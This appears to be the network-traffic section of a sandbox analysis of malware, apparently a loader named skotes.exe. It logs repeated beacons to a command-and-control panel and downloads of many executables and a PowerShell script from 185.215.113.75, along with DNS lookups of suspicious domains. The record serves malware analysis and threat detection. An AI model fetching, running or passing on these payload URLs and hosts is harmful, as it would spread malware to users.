                                                                                              POST /Zu7JuNko/index.php HTTP/1.1
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Host: 185.215.113.43
                                                                                              Content-Length: 31
                                                                                              Cache-Control: no-cache
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                              Date: Thu, 20 Feb 2025 00:33:13 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: keep-alive
                                                                                            • flag-ru
                                                                                              POST
                                                                                              http://185.215.113.43/Zu7JuNko/index.php
                                                                                              skotes.exe
                                                                                              Remote address:
                                                                                              185.215.113.43:80
                                                                                              Request
                                                                                              POST /Zu7JuNko/index.php HTTP/1.1
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Host: 185.215.113.43
                                                                                              Content-Length: 31
                                                                                              Cache-Control: no-cache
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                              Date: Thu, 20 Feb 2025 00:33:17 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: keep-alive
                                                                                            • flag-ru
                                                                                              POST
                                                                                              http://185.215.113.43/Zu7JuNko/index.php
                                                                                              skotes.exe
                                                                                              Remote address:
                                                                                              185.215.113.43:80
                                                                                              Request
                                                                                              POST /Zu7JuNko/index.php HTTP/1.1
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Host: 185.215.113.43
                                                                                              Content-Length: 31
                                                                                              Cache-Control: no-cache
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                              Date: Thu, 20 Feb 2025 00:33:25 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: keep-alive
                                                                                            • flag-ru
                                                                                              POST
                                                                                              http://185.215.113.43/Zu7JuNko/index.php
                                                                                              skotes.exe
                                                                                              Remote address:
                                                                                              185.215.113.43:80
                                                                                              Request
                                                                                              POST /Zu7JuNko/index.php HTTP/1.1
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Host: 185.215.113.43
                                                                                              Content-Length: 31
                                                                                              Cache-Control: no-cache
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                              Date: Thu, 20 Feb 2025 00:33:29 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: keep-alive
                                                                                            • flag-ru
                                                                                              POST
                                                                                              http://185.215.113.43/Zu7JuNko/index.php
                                                                                              skotes.exe
                                                                                              Remote address:
                                                                                              185.215.113.43:80
                                                                                              Request
                                                                                              POST /Zu7JuNko/index.php HTTP/1.1
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Host: 185.215.113.43
                                                                                              Content-Length: 31
                                                                                              Cache-Control: no-cache
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                              Date: Thu, 20 Feb 2025 00:33:33 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: keep-alive
                                                                                            • flag-ru
                                                                                              POST
                                                                                              http://185.215.113.43/Zu7JuNko/index.php
                                                                                              skotes.exe
                                                                                              Remote address:
                                                                                              185.215.113.43:80
                                                                                              Request
                                                                                              POST /Zu7JuNko/index.php HTTP/1.1
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Host: 185.215.113.43
                                                                                              Content-Length: 31
                                                                                              Cache-Control: no-cache
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                              Date: Thu, 20 Feb 2025 00:33:36 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: keep-alive
                                                                                            • flag-ru
                                                                                              POST
                                                                                              http://185.215.113.43/Zu7JuNko/index.php
                                                                                              skotes.exe
                                                                                              Remote address:
                                                                                              185.215.113.43:80
                                                                                              Request
                                                                                              POST /Zu7JuNko/index.php HTTP/1.1
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Host: 185.215.113.43
                                                                                              Content-Length: 31
                                                                                              Cache-Control: no-cache
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                              Date: Thu, 20 Feb 2025 00:33:37 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: keep-alive
                                                                                            • flag-ru
                                                                                              POST
                                                                                              http://185.215.113.43/Zu7JuNko/index.php
                                                                                              skotes.exe
                                                                                              Remote address:
                                                                                              185.215.113.43:80
                                                                                              Request
                                                                                              POST /Zu7JuNko/index.php HTTP/1.1
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Host: 185.215.113.43
                                                                                              Content-Length: 31
                                                                                              Cache-Control: no-cache
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                              Date: Thu, 20 Feb 2025 00:33:40 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: keep-alive
                                                                                            • flag-ru
                                                                                              POST
                                                                                              http://185.215.113.43/Zu7JuNko/index.php
                                                                                              skotes.exe
                                                                                              Remote address:
                                                                                              185.215.113.43:80
                                                                                              Request
                                                                                              POST /Zu7JuNko/index.php HTTP/1.1
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Host: 185.215.113.43
                                                                                              Content-Length: 31
                                                                                              Cache-Control: no-cache
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                              Date: Thu, 20 Feb 2025 00:33:43 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: keep-alive
                                                                                            • flag-ru
                                                                                              POST
                                                                                              http://185.215.113.43/Zu7JuNko/index.php
                                                                                              skotes.exe
                                                                                              Remote address:
                                                                                              185.215.113.43:80
                                                                                              Request
                                                                                              POST /Zu7JuNko/index.php HTTP/1.1
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Host: 185.215.113.43
                                                                                              Content-Length: 31
                                                                                              Cache-Control: no-cache
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                              Date: Thu, 20 Feb 2025 00:33:45 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: keep-alive
                                                                                            • flag-ru
                                                                                              POST
                                                                                              http://185.215.113.43/Zu7JuNko/index.php
                                                                                              skotes.exe
                                                                                              Remote address:
                                                                                              185.215.113.43:80
                                                                                              Request
                                                                                              POST /Zu7JuNko/index.php HTTP/1.1
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Host: 185.215.113.43
                                                                                              Content-Length: 31
                                                                                              Cache-Control: no-cache
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                              Date: Thu, 20 Feb 2025 00:33:48 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: keep-alive
                                                                                            • flag-ru
                                                                                              POST
                                                                                              http://185.215.113.43/Zu7JuNko/index.php
                                                                                              skotes.exe
                                                                                              Remote address:
                                                                                              185.215.113.43:80
                                                                                              Request
                                                                                              POST /Zu7JuNko/index.php HTTP/1.1
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Host: 185.215.113.43
                                                                                              Content-Length: 31
                                                                                              Cache-Control: no-cache
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                              Date: Thu, 20 Feb 2025 00:33:51 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: keep-alive
                                                                                            • flag-ru
                                                                                              POST
                                                                                              http://185.215.113.43/Zu7JuNko/index.php
                                                                                              skotes.exe
                                                                                              Remote address:
                                                                                              185.215.113.43:80
                                                                                              Request
                                                                                              POST /Zu7JuNko/index.php HTTP/1.1
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Host: 185.215.113.43
                                                                                              Content-Length: 31
                                                                                              Cache-Control: no-cache
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                              Date: Thu, 20 Feb 2025 00:33:54 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: keep-alive
                                                                                            • flag-ru
                                                                                              POST
                                                                                              http://185.215.113.43/Zu7JuNko/index.php
                                                                                              skotes.exe
                                                                                              Remote address:
                                                                                              185.215.113.43:80
                                                                                              Request
                                                                                              POST /Zu7JuNko/index.php HTTP/1.1
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Host: 185.215.113.43
                                                                                              Content-Length: 31
                                                                                              Cache-Control: no-cache
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                              Date: Thu, 20 Feb 2025 00:33:56 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: keep-alive
                                                                                            • flag-ru
                                                                                              POST
                                                                                              http://185.215.113.43/Zu7JuNko/index.php
                                                                                              skotes.exe
                                                                                              Remote address:
                                                                                              185.215.113.43:80
                                                                                              Request
                                                                                              POST /Zu7JuNko/index.php HTTP/1.1
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Host: 185.215.113.43
                                                                                              Content-Length: 31
                                                                                              Cache-Control: no-cache
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                              Date: Thu, 20 Feb 2025 00:34:00 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: keep-alive
                                                                                            • flag-ru
                                                                                              POST
                                                                                              http://185.215.113.43/Zu7JuNko/index.php
                                                                                              skotes.exe
                                                                                              Remote address:
                                                                                              185.215.113.43:80
                                                                                              Request
                                                                                              POST /Zu7JuNko/index.php HTTP/1.1
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Host: 185.215.113.43
                                                                                              Content-Length: 31
                                                                                              Cache-Control: no-cache
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                              Date: Thu, 20 Feb 2025 00:34:03 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: keep-alive
                                                                                            • flag-ru
                                                                                              POST
                                                                                              http://185.215.113.43/Zu7JuNko/index.php
                                                                                              skotes.exe
                                                                                              Remote address:
                                                                                              185.215.113.43:80
                                                                                              Request
                                                                                              POST /Zu7JuNko/index.php HTTP/1.1
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Host: 185.215.113.43
                                                                                              Content-Length: 31
                                                                                              Cache-Control: no-cache
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                              Date: Thu, 20 Feb 2025 00:34:06 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: keep-alive
                                                                                            • flag-ru
                                                                                              POST
                                                                                              http://185.215.113.43/Zu7JuNko/index.php
                                                                                              skotes.exe
                                                                                              Remote address:
                                                                                              185.215.113.43:80
                                                                                              Request
                                                                                              POST /Zu7JuNko/index.php HTTP/1.1
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Host: 185.215.113.43
                                                                                              Content-Length: 31
                                                                                              Cache-Control: no-cache
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                              Date: Thu, 20 Feb 2025 00:34:09 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: keep-alive
                                                                                            • flag-ru
                                                                                              POST
                                                                                              http://185.215.113.43/Zu7JuNko/index.php
                                                                                              skotes.exe
                                                                                              Remote address:
                                                                                              185.215.113.43:80
                                                                                              Request
                                                                                              POST /Zu7JuNko/index.php HTTP/1.1
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Host: 185.215.113.43
                                                                                              Content-Length: 31
                                                                                              Cache-Control: no-cache
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                              Date: Thu, 20 Feb 2025 00:34:12 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: keep-alive
                                                                                            • flag-ru
                                                                                              POST
                                                                                              http://185.215.113.43/Zu7JuNko/index.php
                                                                                              skotes.exe
                                                                                              Remote address:
                                                                                              185.215.113.43:80
                                                                                              Request
                                                                                              POST /Zu7JuNko/index.php HTTP/1.1
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Host: 185.215.113.43
                                                                                              Content-Length: 31
                                                                                              Cache-Control: no-cache
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                              Date: Thu, 20 Feb 2025 00:34:20 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: keep-alive
                                                                                            • flag-ru
                                                                                              POST
                                                                                              http://185.215.113.43/Zu7JuNko/index.php
                                                                                              skotes.exe
                                                                                              Remote address:
                                                                                              185.215.113.43:80
                                                                                              Request
                                                                                              POST /Zu7JuNko/index.php HTTP/1.1
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Host: 185.215.113.43
                                                                                              Content-Length: 31
                                                                                              Cache-Control: no-cache
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                              Date: Thu, 20 Feb 2025 00:34:23 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: keep-alive
                                                                                            • flag-ru
                                                                                              POST
                                                                                              http://185.215.113.43/Zu7JuNko/index.php
                                                                                              skotes.exe
                                                                                              Remote address:
                                                                                              185.215.113.43:80
                                                                                              Request
                                                                                              POST /Zu7JuNko/index.php HTTP/1.1
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Host: 185.215.113.43
                                                                                              Content-Length: 31
                                                                                              Cache-Control: no-cache
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                              Date: Thu, 20 Feb 2025 00:34:30 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: keep-alive
                                                                                            • flag-ru
                                                                                              GET
                                                                                              http://185.215.113.75/files/748049926/kdMujZh.exe
                                                                                              skotes.exe
                                                                                              Remote address:
                                                                                              185.215.113.75:80
                                                                                              Request
                                                                                              GET /files/748049926/kdMujZh.exe HTTP/1.1
                                                                                              Host: 185.215.113.75
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                              Date: Thu, 20 Feb 2025 00:32:55 GMT
                                                                                              Content-Type: application/octet-stream
                                                                                              Content-Length: 1745920
                                                                                              Last-Modified: Wed, 19 Feb 2025 22:31:48 GMT
                                                                                              Connection: keep-alive
                                                                                              ETag: "67b65bd4-1aa400"
                                                                                              Accept-Ranges: bytes
                                                                                            • flag-ru
                                                                                              GET
                                                                                              http://185.215.113.75/files/teamex_support/random.exe
                                                                                              skotes.exe
                                                                                              Remote address:
                                                                                              185.215.113.75:80
                                                                                              Request
                                                                                              GET /files/teamex_support/random.exe HTTP/1.1
                                                                                              Host: 185.215.113.75
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                              Date: Thu, 20 Feb 2025 00:32:59 GMT
                                                                                              Content-Type: application/octet-stream
                                                                                              Content-Length: 2087424
                                                                                              Last-Modified: Wed, 19 Feb 2025 23:31:53 GMT
                                                                                              Connection: keep-alive
                                                                                              ETag: "67b669e9-1fda00"
                                                                                              Accept-Ranges: bytes
                                                                                            • flag-ru
                                                                                              GET
                                                                                              http://185.215.113.75/files/SQL_gulong1/random.exe
                                                                                              skotes.exe
                                                                                              Remote address:
                                                                                              185.215.113.75:80
                                                                                              Request
                                                                                              GET /files/SQL_gulong1/random.exe HTTP/1.1
                                                                                              Host: 185.215.113.75
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                              Date: Thu, 20 Feb 2025 00:33:09 GMT
                                                                                              Content-Type: application/octet-stream
                                                                                              Content-Length: 1805824
                                                                                              Last-Modified: Sun, 16 Feb 2025 22:05:42 GMT
                                                                                              Connection: keep-alive
                                                                                              ETag: "67b26136-1b8e00"
                                                                                              Accept-Ranges: bytes
                                                                                            • flag-ru
                                                                                              GET
                                                                                              http://185.215.113.75/files/smirnov2626/random.exe
                                                                                              skotes.exe
                                                                                              Remote address:
                                                                                              185.215.113.75:80
                                                                                              Request
                                                                                              GET /files/smirnov2626/random.exe HTTP/1.1
                                                                                              Host: 185.215.113.75
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                              Date: Thu, 20 Feb 2025 00:33:13 GMT
                                                                                              Content-Type: application/octet-stream
                                                                                              Content-Length: 1820672
                                                                                              Last-Modified: Wed, 19 Feb 2025 23:12:31 GMT
                                                                                              Connection: keep-alive
                                                                                              ETag: "67b6655f-1bc800"
                                                                                              Accept-Ranges: bytes
                                                                                            • flag-ru
                                                                                              GET
                                                                                              http://185.215.113.75/files/martin1/random.exe
                                                                                              skotes.exe
                                                                                              Remote address:
                                                                                              185.215.113.75:80
                                                                                              Request
                                                                                              GET /files/martin1/random.exe HTTP/1.1
                                                                                              Host: 185.215.113.75
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                              Date: Thu, 20 Feb 2025 00:33:18 GMT
                                                                                              Content-Type: application/octet-stream
                                                                                              Content-Length: 6519808
                                                                                              Last-Modified: Thu, 20 Feb 2025 00:04:44 GMT
                                                                                              Connection: keep-alive
                                                                                              ETag: "67b6719c-637c00"
                                                                                              Accept-Ranges: bytes
                                                                                            • flag-ru
                                                                                              GET
                                                                                              http://185.215.113.75/files/bonus_max/random.exe
                                                                                              skotes.exe
                                                                                              Remote address:
                                                                                              185.215.113.75:80
                                                                                              Request
                                                                                              GET /files/bonus_max/random.exe HTTP/1.1
                                                                                              Host: 185.215.113.75
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                              Date: Thu, 20 Feb 2025 00:33:25 GMT
                                                                                              Content-Type: application/octet-stream
                                                                                              Content-Length: 2115072
                                                                                              Last-Modified: Wed, 19 Feb 2025 23:08:43 GMT
                                                                                              Connection: keep-alive
                                                                                              ETag: "67b6647b-204600"
                                                                                              Accept-Ranges: bytes
                                                                                            • flag-ru
                                                                                              GET
                                                                                              http://185.215.113.75/files/5728215906/d2YQIJa.exe
                                                                                              skotes.exe
                                                                                              Remote address:
                                                                                              185.215.113.75:80
                                                                                              Request
                                                                                              GET /files/5728215906/d2YQIJa.exe HTTP/1.1
                                                                                              Host: 185.215.113.75
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                              Date: Thu, 20 Feb 2025 00:33:29 GMT
                                                                                              Content-Type: application/octet-stream
                                                                                              Content-Length: 2049024
                                                                                              Last-Modified: Mon, 17 Feb 2025 17:56:09 GMT
                                                                                              Connection: keep-alive
                                                                                              ETag: "67b37839-1f4400"
                                                                                              Accept-Ranges: bytes
                                                                                            • flag-ru
                                                                                              GET
                                                                                              http://185.215.113.75/files/1760365699/f3Ypd8O.exe
                                                                                              skotes.exe
                                                                                              Remote address:
                                                                                              185.215.113.75:80
                                                                                              Request
                                                                                              GET /files/1760365699/f3Ypd8O.exe HTTP/1.1
                                                                                              Host: 185.215.113.75
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                              Date: Thu, 20 Feb 2025 00:33:33 GMT
                                                                                              Content-Type: application/octet-stream
                                                                                              Content-Length: 695808
                                                                                              Last-Modified: Wed, 19 Feb 2025 20:38:35 GMT
                                                                                              Connection: keep-alive
                                                                                              ETag: "67b6414b-a9e00"
                                                                                              Accept-Ranges: bytes
                                                                                            • flag-ru
                                                                                              GET
                                                                                              http://185.215.113.75/files/5803047068/oKUl4yo.exe
                                                                                              skotes.exe
                                                                                              Remote address:
                                                                                              185.215.113.75:80
                                                                                              Request
                                                                                              GET /files/5803047068/oKUl4yo.exe HTTP/1.1
                                                                                              Host: 185.215.113.75
                                                                                              Response
                                                                                              HTTP/1.1 404 Not Found
                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                              Date: Thu, 20 Feb 2025 00:33:36 GMT
                                                                                              Content-Type: text/html
                                                                                              Content-Length: 162
                                                                                              Connection: keep-alive
                                                                                            • flag-ru
                                                                                              GET
                                                                                              http://185.215.113.75/files/7098980627/7aencsM.exe
                                                                                              skotes.exe
                                                                                              Remote address:
                                                                                              185.215.113.75:80
                                                                                              Request
                                                                                              GET /files/7098980627/7aencsM.exe HTTP/1.1
                                                                                              Host: 185.215.113.75
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                              Date: Thu, 20 Feb 2025 00:33:38 GMT
                                                                                              Content-Type: application/octet-stream
                                                                                              Content-Length: 278528
                                                                                              Last-Modified: Tue, 18 Feb 2025 14:27:06 GMT
                                                                                              Connection: keep-alive
                                                                                              ETag: "67b498ba-44000"
                                                                                              Accept-Ranges: bytes
                                                                                            • flag-ru
                                                                                              GET
                                                                                              http://185.215.113.75/files/1506757897/tYliuwV.ps1
                                                                                              skotes.exe
                                                                                              Remote address:
                                                                                              185.215.113.75:80
                                                                                              Request
                                                                                              GET /files/1506757897/tYliuwV.ps1 HTTP/1.1
                                                                                              Host: 185.215.113.75
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                              Date: Thu, 20 Feb 2025 00:33:40 GMT
                                                                                              Content-Type: application/octet-stream
                                                                                              Content-Length: 902340
                                                                                              Last-Modified: Fri, 14 Feb 2025 09:03:17 GMT
                                                                                              Connection: keep-alive
                                                                                              ETag: "67af06d5-dc4c4"
                                                                                              Accept-Ranges: bytes
                                                                                            • flag-ru
                                                                                              GET
                                                                                              http://185.215.113.75/files/7708303768/9aiiMOQ.exe
                                                                                              skotes.exe
                                                                                              Remote address:
                                                                                              185.215.113.75:80
                                                                                              Request
                                                                                              GET /files/7708303768/9aiiMOQ.exe HTTP/1.1
                                                                                              Host: 185.215.113.75
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                              Date: Thu, 20 Feb 2025 00:33:45 GMT
                                                                                              Content-Type: application/octet-stream
                                                                                              Content-Length: 669184
                                                                                              Last-Modified: Wed, 19 Feb 2025 14:44:50 GMT
                                                                                              Connection: keep-alive
                                                                                              ETag: "67b5ee62-a3600"
                                                                                              Accept-Ranges: bytes
                                                                                            • flag-ru
                                                                                              GET
                                                                                              http://185.215.113.75/files/osint1618/random.exe
                                                                                              skotes.exe
                                                                                              Remote address:
                                                                                              185.215.113.75:80
                                                                                              Request
                                                                                              GET /files/osint1618/random.exe HTTP/1.1
                                                                                              Host: 185.215.113.75
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                              Date: Thu, 20 Feb 2025 00:33:48 GMT
                                                                                              Content-Type: application/octet-stream
                                                                                              Content-Length: 2058752
                                                                                              Last-Modified: Wed, 19 Feb 2025 23:15:20 GMT
                                                                                              Connection: keep-alive
                                                                                              ETag: "67b66608-1f6a00"
                                                                                              Accept-Ranges: bytes
                                                                                            • flag-ru
                                                                                              GET
                                                                                              http://185.215.113.75/files/5803047068/ymy1CwP.exe
                                                                                              skotes.exe
                                                                                              Remote address:
                                                                                              185.215.113.75:80
                                                                                              Request
                                                                                              GET /files/5803047068/ymy1CwP.exe HTTP/1.1
                                                                                              Host: 185.215.113.75
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                              Date: Thu, 20 Feb 2025 00:33:52 GMT
                                                                                              Content-Type: application/octet-stream
                                                                                              Content-Length: 248832
                                                                                              Last-Modified: Thu, 20 Feb 2025 00:20:36 GMT
                                                                                              Connection: keep-alive
                                                                                              ETag: "67b67554-3cc00"
                                                                                              Accept-Ranges: bytes
                                                                                            • flag-ru
                                                                                              GET
                                                                                              http://185.215.113.75/files/ReverseSheller/random.exe
                                                                                              skotes.exe
                                                                                              Remote address:
                                                                                              185.215.113.75:80
                                                                                              Request
                                                                                              GET /files/ReverseSheller/random.exe HTTP/1.1
                                                                                              Host: 185.215.113.75
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                              Date: Thu, 20 Feb 2025 00:34:12 GMT
                                                                                              Content-Type: application/octet-stream
                                                                                              Content-Length: 10302976
                                                                                              Last-Modified: Fri, 24 Jan 2025 18:07:34 GMT
                                                                                              Connection: keep-alive
                                                                                              ETag: "6793d6e6-9d3600"
                                                                                              Accept-Ranges: bytes
                                                                                            • flag-ru
                                                                                              GET
                                                                                              http://185.215.113.75/files/asjduwgsgausi/random.exe
                                                                                              skotes.exe
                                                                                              Remote address:
                                                                                              185.215.113.75:80
                                                                                              Request
                                                                                              GET /files/asjduwgsgausi/random.exe HTTP/1.1
                                                                                              Host: 185.215.113.75
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                              Date: Thu, 20 Feb 2025 00:34:20 GMT
                                                                                              Content-Type: application/octet-stream
                                                                                              Content-Length: 332800
                                                                                              Last-Modified: Fri, 07 Feb 2025 04:36:30 GMT
                                                                                              Connection: keep-alive
                                                                                              ETag: "67a58dce-51400"
                                                                                              Accept-Ranges: bytes
                                                                                            • flag-ru
                                                                                              GET
                                                                                              http://185.215.113.75/files/martin2/random.exe
                                                                                              skotes.exe
                                                                                              Remote address:
                                                                                              185.215.113.75:80
                                                                                              Request
                                                                                              GET /files/martin2/random.exe HTTP/1.1
                                                                                              Host: 185.215.113.75
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                              Date: Thu, 20 Feb 2025 00:34:23 GMT
                                                                                              Content-Type: application/octet-stream
                                                                                              Content-Length: 4747776
                                                                                              Last-Modified: Wed, 19 Feb 2025 23:12:26 GMT
                                                                                              Connection: keep-alive
                                                                                              ETag: "67b6655a-487200"
                                                                                              Accept-Ranges: bytes
                                                                                            • flag-ru
                                                                                              GET
                                                                                              http://185.215.113.75/files/5996006993/dzvh4HC.exe
                                                                                              skotes.exe
                                                                                              Remote address:
                                                                                              185.215.113.75:80
                                                                                              Request
                                                                                              GET /files/5996006993/dzvh4HC.exe HTTP/1.1
                                                                                              Host: 185.215.113.75
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                              Date: Thu, 20 Feb 2025 00:34:30 GMT
                                                                                              Content-Type: application/octet-stream
                                                                                              Content-Length: 18855936
                                                                                              Last-Modified: Wed, 19 Feb 2025 10:37:07 GMT
                                                                                              Connection: keep-alive
                                                                                              ETag: "67b5b453-11fb800"
                                                                                              Accept-Ranges: bytes
                                                                                            • flag-us
                                                                                              DNS
                                                                                              fruitfuvljourney.tech
                                                                                              8827e2f2e3.exe
                                                                                              Remote address:
                                                                                              8.8.8.8:53
                                                                                              Request
                                                                                              fruitfuvljourney.tech
                                                                                              IN A
                                                                                              Response
                                                                                            • flag-us
                                                                                              DNS
                                                                                              nestlecompany.world
                                                                                              d2YQIJa.exe
                                                                                              Remote address:
                                                                                              8.8.8.8:53
                                                                                              Request
                                                                                              nestlecompany.world
                                                                                              IN A
                                                                                              Response
                                                                                            • flag-us
                                                                                              DNS
                                                                                              hoyoverse.blog
                                                                                              8827e2f2e3.exe
                                                                                              Remote address:
                                                                                              8.8.8.8:53
                                                                                              Request
                                                                                              hoyoverse.blog
                                                                                              IN A
                                                                                              Response
                                                                                              hoyoverse.blog
                                                                                              IN A
                                                                                              104.21.96.1
                                                                                              hoyoverse.blog
                                                                                              IN A
                                                                                              104.21.48.1
                                                                                              hoyoverse.blog
                                                                                              IN A
                                                                                              104.21.64.1
                                                                                              hoyoverse.blog
